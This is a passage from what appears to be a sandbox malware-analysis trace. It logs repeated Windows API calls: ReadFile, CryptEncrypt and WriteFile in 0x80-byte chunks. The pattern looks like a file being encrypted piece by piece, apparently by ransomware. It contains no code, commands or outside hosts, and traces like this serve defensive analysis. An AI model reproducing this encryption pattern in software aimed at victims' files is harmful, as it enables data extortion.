hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.902] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.902] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.902] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.902] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.902] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.903] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.903] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.903] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.903] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.903] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.903] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.903] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.904] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.904] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.904] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.904] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.904] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.904] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.904] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.904] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.904] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.904] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.904] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.904] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.904] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.904] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.904] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.905] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.905] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.905] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.905] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.905] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.905] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.905] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.906] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.906] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.906] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.906] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.906] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.906] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.906] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.907] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.907] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.907] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.907] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.907] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.907] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.907] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.908] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.908] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.908] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, 